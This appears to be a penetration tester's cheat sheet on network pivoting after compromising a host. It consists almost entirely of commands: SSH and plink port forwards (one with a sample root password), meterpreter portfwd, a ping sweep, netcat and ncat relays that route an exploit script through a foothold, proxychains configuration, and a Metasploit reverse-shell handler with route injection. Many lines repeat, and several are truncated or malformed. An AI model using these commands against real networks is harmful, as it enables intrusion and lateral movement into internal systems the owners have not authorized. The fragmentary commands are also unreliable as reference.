Pivotind understanding

​https://n0where.net/how-to-ssh-tunnels-and-stuff​
ssh -L 9001:yahoo.com:80 home -L ::
ssh -L :: 
ssh -R 9001:intra-site.com:80 home (Executed from 'work')
plink.exe -l root -pw mysecretpassword 111.111.111.111 -R 3307:127.0.0.1:3306
Port forward with metasploit We can also forward ports using metasploit. Say that the compromised machine is running services that are only accessible from within the network, from within that machine. To access that port we can do this in meterpreter: portfwd add -l  -p  -r  portfwd add -l 3306 -p 3306 -r 192.168.222
portfwd add -l 3389 -p 3389 -r 192.168.1.222
[email protected]:~# for i in $(seq 1 254); do (ping -c 1 10.2.2.${i} | grep "bytes from" &); done;
$nc –l –p 80 0backpipe
ssh –L port:destination_host:destination_port [email protected]_host
ssh -L 80:ip:80 [email protected] - local port forwarding
nmap -PN -sT -sV –p 80 localhost
nmap -PN -sV –p 80 --script=http-methods localhost
nikto -host ip -useproxy http://127.0.0.1:80/​
burp suite: destination host: * proxy host: 127.0.0.1 proxy port: 80 Authenticaton type: none
Dynamic port forwarding
SSH dynamic port forwarding is set up on the attacker’s system by entering:
ssh -D 127.0.0.1:9150 -f -N [email protected]
The syntax of the command is ssh –D address:port –f –N [email protected]_host
2.8 Using Ncat for Pivoting
ncat --listen --proxy-type http ip 8080
run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24
use auxiliary/server/socks4a
==================================================================================== ssh portforwarding
ssh -L 127.0.0.1:10000:192.168.63.142:10000 [email protected]
ssh -L 127.0.0.1:4444:192.168.63.142:4444 [email protected]
====================================================================================
proxychaing portforwarding https://github.com/haad/proxychains​
ssh -D 127.0.0.1:8888 [email protected]
strict_chain quiet_mode proxy_dns remote_dns_subnet 224 tcp_read_time_out 15000 tcp_connect_time_out 8000 localnet 127.0.0.0/255.0.0.0
[ProxyList] socks4 127.0.0.1 8888
proxychains4 -f ~/pivot.conf /usr/bin/python exploit.py ip 10000
proxychains4 -f ~/pivot.conf ncat -v ip 4444
=======================================================================================
ncat LDFLAGS="-static" ./configure && make ncat_build (build ncat static binary)
ncat -lv --broker -m2 10000 $ ncat -v 192.168.81.125 10000 -c "ncat -v 192.168.63.142 10000"
./exploit.py 127.0.0.1 10000
ncat -lv --broker -m2 4444
$ ncat -v 192.168.81.125 4444 -c "ncat -v 192.168.63.142 4444"
nc -v 127.0.0.1 4444
============================================================================= metasploit
msfcli exploit/multi/handler PAYLOAD=php/meterpreter_reverse_tcp LHOST=ip LPORT=9999 E
msf exploit(handler) > route add ip 255.255.255.0 1
​https://blog.techorganic.com/2012/10/10/introduction-to-pivoting-part-2-proxychains/​

Tunneling and Port Forwarding

Buffer Overflow

Last modified 2yr ago

Pivotind understanding

ssh -L 80:ip:80 [email protected] - local port forwarding

nmap -PN -sT -sV –p 80 localhost

nmap -PN -sV –p 80 --script=http-methods localhost

nikto -host ip -useproxy http://127.0.0.1:80/​

ssh -D 127.0.0.1:9150 -f -N [email protected]

proxychains4 -f ~/pivot.conf ncat -v ip 4444

./exploit.py 127.0.0.1 10000

ncat -lv --broker -m2 4444

nc -v 127.0.0.1 4444

msfcli exploit/multi/handler PAYLOAD=php/meterpreter_reverse_tcp LHOST=ip LPORT=9999 E

nikto -host ip -useproxy http://127.0.0.1:80/